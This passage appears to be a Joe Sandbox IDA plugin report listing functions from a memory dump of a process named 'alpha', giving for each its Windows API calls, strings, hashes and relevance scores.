Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
Instruction Fuzzy Hash: DD113452608641C6EB298B22E802279B6E0FF4D799F4D813AED0D97794DF3CD041C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F758D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F75903
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F75943
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F75956

Strings

UBR, xrefs: 00007FF683F7593C
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF683F758F5

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
API String ID: 3677997916-3870813718
Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
Instruction ID: 70d7c2c76536e3f1d11ff3b9b38d1f00fd79eb6ac571e3233fc0839cb01cad18
Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
Instruction Fuzzy Hash: 98114C3261CB81C7EB108B10E44126AF7B4FB897A4F44423ADA8D63768DF7CD048CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F74C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F74C78

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

wcsrchr.MSVCRT ref: 00007FF683F74CB9
wcsrchr.MSVCRT ref: 00007FF683F74CE6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F74DD7
wcschr.MSVCRT ref: 00007FF683F928DB

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memsetwcsrchr$wcschr
String ID:
API String ID: 110935159-0
Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
Instruction ID: 1ba212980b3b00919b3d2d9fe5fb84414df67de2fec980121dfd04ceb291c79f
Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
Instruction Fuzzy Hash: F851D422B09686D5FE218F5198023F9A2A0BF49BA4F0D4539CE5DAB7C4DE3CE542C280

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F85EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F85F5D

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F86029

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

towupper.MSVCRT ref: 00007FF683F85FFE

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$CurrentDirectorytowupper
String ID:
API String ID: 1403193329-0
Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
Instruction ID: 1f00a7cc8bafc6e86a97ed765c168149f124fb242cf04b9721162e28f1f78c69
Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
Instruction Fuzzy Hash: FC51C526B06681C5EB298F22D9066BA77A0FF48758F498139CA1DAB794EF3CD544C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F791C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7921C

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F793AA

Part of subcall function 00007FF683F78B20: wcsrchr.MSVCRT ref: 00007FF683F78BAB
Part of subcall function 00007FF683F78B20: _wcsicmp.MSVCRT ref: 00007FF683F78BD4
Part of subcall function 00007FF683F78B20: _wcsicmp.MSVCRT ref: 00007FF683F78BF2
Part of subcall function 00007FF683F78B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F78C16
Part of subcall function 00007FF683F78B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F78C2F
Part of subcall function 00007FF683F78B20: wcschr.MSVCRT ref: 00007FF683F78CB3

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF683F792AC), ref: 00007FF683F830CA
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F830DD
Part of subcall function 00007FF683F83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F830F6
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F83106

wcsrchr.MSVCRT ref: 00007FF683F792D8
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F79362
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F79373

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
String ID:
API String ID: 3966000956-0
Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
Instruction ID: e228f4a4f43b89631fdbf81b8061b9de2fd5bc23c143039003724e64921e9c5a
Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
Instruction Fuzzy Hash: A151A132A09682C6EB659F21D8522B973B4FF49B98F084039DA4DA7B94DF3CE551C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F72A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

_setjmp.MSVCRT ref: 00007FF683F72A6A
memset.MSVCRT ref: 00007FF683F72AB4
memset.MSVCRT ref: 00007FF683F72AD8
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72BED
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72C0D

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$_setjmp
String ID:
API String ID: 3883041866-0
Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
Instruction ID: 9f3f95746d5fd717c4a33b72af5160cd374b006152ce22598689fe5c2640a024
Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
Instruction Fuzzy Hash: DC515872A08BC6CAEB618F25D8413E977A4FF49748F484139DA4C9BA48DF3CD644CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF683F7B4BD

Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806D6
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F806F0
Part of subcall function 00007FF683F806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F8074D
Part of subcall function 00007FF683F806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF683F7B4DB), ref: 00007FF683F80762

_wcsicmp.MSVCRT ref: 00007FF683F7B518
_wcsicmp.MSVCRT ref: 00007FF683F7B58B

Strings

IF/?, xrefs: 00007FF683F7B4B4
ELSE, xrefs: 00007FF683F7B584

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$_wcsicmp$AllocProcess
String ID: ELSE$IF/?
API String ID: 3223794493-1134991328
Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
Instruction ID: 4827480797df4d01fd441324d3c5b73d5775d044b063928fcc011a53a897863e
Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
Instruction Fuzzy Hash: 2E413921E0E683C2FB65AB25A4132B926A1BF45784F5C403DD94EE73A6DE3CE801C7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F9E43A
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9E45A
_get_osfhandle.MSVCRT ref: 00007FF683F9E4D9
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9E4F1

Part of subcall function 00007FF683F9D9D0: longjmp.MSVCRT(?,?,00000000,00007FF683F9048E), ref: 00007FF683F9DA58
Part of subcall function 00007FF683F9D9D0: memset.MSVCRT ref: 00007FF683F9DAD6
Part of subcall function 00007FF683F9D9D0: memset.MSVCRT ref: 00007FF683F9DAFC
Part of subcall function 00007FF683F9D9D0: memset.MSVCRT ref: 00007FF683F9DB22

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$File_get_osfhandle$PointerReadlongjmp
String ID:
API String ID: 1532185241-0
Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
Instruction ID: be17396ac4f58e0a8b173abe2f68be31bcecd0e0c6c4d634a15945f2867df5ea
Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
Instruction Fuzzy Hash: D341D432A04751CBE7549F21D44697D7AA1FF88B80F489539EE0AA7785CF3CE845CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F74FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.MSVCRT ref: 00007FF683F75012
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F75030
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F92A84
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F92AD8
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F92B0F

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
Instruction ID: 443a5aa2f2d37c648190755bc3a02b8a46fb98c97a6133d83935c64336bcdb29
Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
Instruction Fuzzy Hash: 9A415E72A08682CBE7649F51E45227DA6A1FF85B80F58803DDA4EE7791CE2CE841C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F9E5AD
memset.MSVCRT ref: 00007FF683F9E5D2

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

_wcsicmp.MSVCRT ref: 00007FF683F9E6A0
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E6CB
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9E6EB

Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF683F792AC), ref: 00007FF683F830CA
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F830DD
Part of subcall function 00007FF683F83060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F830F6
Part of subcall function 00007FF683F83060: SetErrorMode.KERNELBASE ref: 00007FF683F83106

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ErrorModememset$FullNamePath_wcsicmp
String ID:
API String ID: 2123716050-0
Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
Instruction ID: 6026eebdeb9e79b4d19c5dde34ce37e7e29a090037ba80728e93e611cb5b2ae0
Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
Instruction Fuzzy Hash: 74415E32709BC28AEB758F25D8513E96794FF4978CF084139DA4D9BA99DE3CD244C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F765F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF683F76627
GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF683F76642

Part of subcall function 00007FF683F85A68: _get_osfhandle.MSVCRT ref: 00007FF683F85A89
Part of subcall function 00007FF683F85A68: SetConsoleMode.KERNELBASE ref: 00007FF683F85A9E
Part of subcall function 00007FF683F85A68: _get_osfhandle.MSVCRT ref: 00007FF683F85AAC

memset.MSVCRT ref: 00007FF683F76697
GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00007FF683F766B0
RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0 ref: 00007FF683F7670C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
String ID:
API String ID: 3114114779-0
Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
Instruction ID: 1eff21ee8f741185eca6e2f0ace2d8ffac3508e2a36479e7e6dbd0480884d723
Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
Instruction Fuzzy Hash: 46411836A09B42CAEB00CF65D8412AC37B5FB88748F59413ADE0DA7B54DF38D416C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A77A
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A7AF
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A80E
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A839
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF683F99A82), ref: 00007FF683F9A850

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: QueryValue$CloseErrorLastOpen
String ID:
API String ID: 2240656346-0
Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
Instruction ID: 488aa2b3227d7b054f20186300ab82cad0373c40e774c446b1d6eb85b7afe52e
Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
Instruction Fuzzy Hash: B7316E32A18A82C6EB508F15E441579B6A5FF8D790F584139EE4EA3764DF3CD845CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF683F801B8: _get_osfhandle.MSVCRT ref: 00007FF683F801C4
Part of subcall function 00007FF683F801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF683F8E904,?,?,?,?,00000000,00007FF683F83491,?,?,?,00007FF683F94420), ref: 00007FF683F801D6

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F9D0F9
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F9D10F
ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F9D166
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F9D17A
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F9D18C

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
String ID:
API String ID: 3008996577-0
Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
Instruction ID: cbc2c4d5c98e6b8cb05ead58af7c782a20ce1243974f1b95be8483156f7100a6
Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
Instruction Fuzzy Hash: 08212826B14A51CAF7009BB1E8110BD77B0FF4DB59B58512AEE0DA3B98EF38D041CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F95770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F95874
CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F9595E

Strings

_p0, xrefs: 00007FF683F95811
wil, xrefs: 00007FF683F958A8, 00007FF683F95993

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CreateSemaphore
String ID: _p0$wil
API String ID: 1078844751-1814513734
Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
Instruction ID: e0ff53c7615c12aed4fd740009089e42b8cd450668172f27b7e6a45fa445a8df
Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
Instruction Fuzzy Hash: 36511562B19786C6EF629F1484562B972A4FF84B94F5C4439DE4EA7784DF3CE405C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON

